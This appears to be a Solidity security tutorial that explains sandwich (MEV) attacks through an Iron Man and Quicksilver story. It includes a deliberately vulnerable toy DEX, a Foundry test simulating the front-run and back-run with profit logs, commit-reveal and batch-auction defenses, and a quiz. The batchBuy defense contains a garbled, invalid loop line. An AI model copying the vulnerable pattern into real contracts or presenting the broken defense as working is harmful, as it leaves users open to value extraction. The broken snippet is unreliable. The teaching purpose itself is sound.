Quicksilver vs. Iron Man – Outrunning the Sandwich Attack (MEV) in Solidity 🥪#

TL;DR: Maximal Extractable Value (MEV)#

• Vulnerability: Ethereum’s Mempool exposes pending transactions, enabling attackers to reorder them for profit via Sandwich Attacks.
• Impact: Victims (e.g., traders) receive fewer tokens due to negative slippage, while attackers extract near risk-free profit (MEV).
• Fixes: Commit–Reveal Schemes, Batch Auctions, and Private Transaction Relays (Flashbots) with strict Slippage Protection.

🎬 Story Time#

In the bustling DeFi hub of Stark City, Iron Man (Tony Stark) fires up his HUD, submitting a massive buy order to StarkSwap, a decentralized exchange (DEX). His transaction, glowing with 1 ETH, lands in the Mempool-Ethereum’s public queue, visible to all. JARVIS warns of prying eyes, but it’s too late. Quicksilver, a lightning-fast MEV bot, scans the mempool with predatory precision. Spotting Iron Man’s trade, Quicksilver predicts a price spike and launches a three-step sandwich attack:

1. Front-Run (First Slice 🍞): Quicksilver submits a small buy with a higher gas fee, executing just before Iron Man’s trade, inflating the token price.
2. Iron Man’s Trade (The Filling 🥩): Stark’s order executes at the worse price, yielding fewer tokens due to negative slippage.
3. Back-Run (Second Slice 🍞): Quicksilver sells at the artificially high price, pocketing risk-free profit.

Quicksilver’s speed outpaces Iron Man’s tech, draining value in a flash. Can Stark and JARVIS outsmart this MEV heist?

Vulnerable Pattern: StarkSwap.sol#

The vulnerability lies in the public exposure of trade intent (msg.value) in the mempool, allowing precise price manipulation.

Note: Simplified AMM for demonstration; real DEXs include fees, liquidity pools, etc.

1
// SPDX-License-Identifier: MIT
2
pragma solidity ^0.8.24;
3

4
contract StarkSwap {
5
    mapping(address => uint256) public balances;
6
    uint256 public reserveETH = 1000 ether;
7
    uint256 public reserveToken = 10000 ether;
8

9
    function buy(uint256 minTokens) public payable {
10
        uint256 tokensOut = (msg.value * reserveToken) / (reserveETH + msg.value);
11
        require(tokensOut >= minTokens, "Slippage too high");
12
        reserveETH += msg.value;
13
        reserveToken -= tokensOut;
14
        balances[msg.sender] += tokensOut;
15
        // 🛑 Vulnerability: msg.value visible in mempool
16
    }
17

18
    function sell(uint256 tokenAmount, uint256 minEth) public returns (uint256 ethOut) {
19
        ethOut = (tokenAmount * reserveETH) / (reserveToken + tokenAmount);
20
        require(ethOut >= minEth, "Slippage too high");
21
        require(balances[msg.sender] >= tokenAmount, "Not enough tokens");
22
        balances[msg.sender] -= tokenAmount;
23
        reserveToken += tokenAmount;
24
        reserveETH -= ethOut;
25
        payable(msg.sender).transfer(ethOut);
26
        return ethOut;
27
    }
28
}

Proof of Exploit: Foundry Simulation (The Full Sandwich)#

This Foundry test simulates Quicksilver’s attack, showing Iron Man’s loss and the attacker’s profit.

1
// SPDX-License-Identifier: MIT
2
pragma solidity ^0.8.24;
3

4
import "forge-std/Test.sol";
5
import {StarkSwap} from "../../src/Multiverse-Case-Studies/Sandwich-MEV/StarkSwap.sol";
6

7
contract StarkSwapTest is Test {
8
    StarkSwap dex;
9
    address IronMan = makeAddr("IronMan");
10
    address Quicksilver = makeAddr("Quicksilver");
11

12
    function setUp() public {
13
        dex = new StarkSwap();
14
        vm.deal(IronMan, 10 ether);
15
        vm.deal(Quicksilver, 10 ether);
16
    }
17

18
    function testSandwichAttack() public {
19
        // STEP 1: Front-Run
20
        vm.prank(Quicksilver);
21
        dex.buy{value: 1 ether}(10);
22
        uint256 Q_tokens_acquired = dex.balances(Quicksilver);
23

24
        // STEP 2: Victim's Trade
25
        vm.prank(IronMan);
26
        dex.buy{value: 1 ether}(10);
27

28
        // STEP 3: Back-Run
29
        vm.prank(Quicksilver);
30
        uint256 Q_eth_revenue = dex.sell(Q_tokens_acquired, 0);
31

32
        // Check: Iron Man’s Loss
33
        assertLt(dex.balances(IronMan), 95 ether, "Iron Man received fewer tokens");
34
        // Check: Quicksilver’s Profit
35
        uint256 Q_cost = 1 ether;
36
        uint256 netProfit = Q_eth_revenue - Q_cost;
37
        console.log("Q's ETH Cost (Front-Run):", Q_cost);
38
        console.log("Q's ETH Revenue (Back-Run):", Q_eth_revenue);
39
        console.log("Quicksilver's Net Profit (MEV):", netProfit);
40
        assertGt(netProfit, 0, "Quicksilver failed to profit");
41
    }
42
}

Logs:

• Q’s ETH Cost (Front-Run): 1000000000000000000
• Q’s ETH Revenue (Back-Run): 1001998000003992007
• Quicksilver’s Net Profit (MEV): 1998000003992007

Professional Defense Mechanisms#

1
// SPDX-License-Identifier: MIT
2
pragma solidity ^0.8.24;
3

4
contract StarkSwapCommitReveal {
5
    mapping(address => uint256) public balances;
6
    mapping(address => bytes32) public commitments;
7
    uint256 public reserveETH = 1000 ether;
8
    uint256 public reserveToken = 10000 ether;
9

10
    // Step 1: Commit hash
11
    function commit(bytes32 hash) public {
12
        commitments[msg.sender] = hash;
13
    }
14

15
    // Step 2: Reveal trade
16
    function reveal(uint256 ethAmount, uint256 nonce, uint256 minTokens) public payable {
17
        bytes32 hash = keccak256(abi.encodePacked(msg.sender, ethAmount, nonce));
18
        require(commitments[msg.sender] == hash, "Invalid reveal");
19
        require(msg.value == ethAmount, "Incorrect ETH");
20
        uint256 tokensOut = (ethAmount * reserveToken) / (reserveETH + ethAmount);
21
        require(tokensOut >= minTokens, "Slippage too high");
22
        reserveETH += ethAmount;
23
        reserveToken -= tokensOut;
24
        balances[msg.sender] += tokensOut;
25
        commitments[msg.sender] = bytes32(0);
26
    }
27
}

1
// Add to StarkSwap.sol or new contract
2
function batchBuy(uint256 minTokens, address[] memory users, uint256[] memory amounts) public payable {
3
    require(users.length == amounts.length, "Invalid input");
4
    uint256 totalETH;
5
    uint256 totalTokens;
6

7
    // Calculate total token allocation
8
    for (uint256 i = 0; i < users.length; i++) {
9
        totalETH += amounts[i];
10
        uint256 tokensOut = (amounts[i] * reserveToken) / (reserveETH + totalETH);
11
        require(tokensOut >= minTokens, "Slippage too high");
12
        totalTokens += tokensOut;
13
    }
14

15
    // Update reserves
16
    reserveETH += totalETH;
17
    reserveToken -= totalTokens;
18

19
    // Allocate tokens
20
    for (uint Ascending | Descending) {
21
        balances[users[i]] += (amounts[i] * totalTokens) / totalETH;
22
    }
23
}

Challenge: Outrun Quicksilver’s Sandwich Attack!#

Challenge Name: Stark’s MEV Defense Mission
Description: Outsmart Quicksilver like Iron Man and JARVIS! Secure StarkSwap from sandwich attacks!

1. Deploy StarkSwap.sol on Sepolia testnet (use Remix or Foundry).
2. Execute the sandwich attack using the provided Foundry test to see Iron Man’s losses.
3. Implement a fix (e.g., StarkSwapCommitReveal.sol or batchBuy with 0.5% slippage).
4. Submit your fix to the Discussions tab, and share your Sepolia address on X with #TheSandFChallenge and tag @THE_SANDF.
5. Bonus: Post a screenshot of JARVIS’s transaction logs!
6. Top submissions earn a chance to join our audit beta program!

Three Quiz Questions to Test Understanding#

1. What makes StarkSwap.sol vulnerable to a sandwich attack?
   a) Lack of access control in buy()
   b) Public exposure of trade details in the mempool
   c) Missing reentrancy protection in sell()
   d) Incorrect reserve calculations in the AMM

   Show Answer

   Answer: b) Public exposure of trade details in the mempool
   Explanation: Mempool visibility lets Quicksilver front-run Iron Man’s trade, rigging the price.

2. Which sequence correctly describes Quicksilver’s Sandwich Attack?

• a) Back-Run (Sell) → Iron Man Trade → Front-Run (Buy)

• b) Iron Man Trade → Front-Run (Buy) → Back-Run (Sell)

• c) Front-Run (Buy) → Iron Man Trade → Back-Run (Sell)

• d) Front-Run (Buy) → Back-Run (Sell) → Iron Man Trade

  Show Answer

  Answer: c) Front-Run (Buy) → Iron Man Trade → Back-Run (Sell)
  Explanation: The attacker first buys to raise the price (Front-Run), then the victim’s trade executes at a worse price, and finally the attacker sells the tokens (Back-Run) for a profit.

3. What is the primary impact of a sandwich attack on Iron Man’s trade?
   a) Higher gas fees
   b) Fewer tokens due to negative slippage
   c) Direct ETH theft by Quicksilver
   d) Drained DEX reserves

   Show Answer

   Answer: b) Fewer tokens due to negative slippage
   Explanation: Quicksilver’s front-run raises the price, reducing Iron Man’s tokens.

Ready to Battle Bugs?#

Join the Defi CTF Challenge! Audit vulnerable contracts in our Defi CTF Challenges (Full credit to Hans Friese, co-founder of Cyfrin.), submit your report via GitHub Issues/Discussions, or tag @THE_SANDF on X. Let’s secure the Web3 multiverse together! 🏗️ Start the Challenge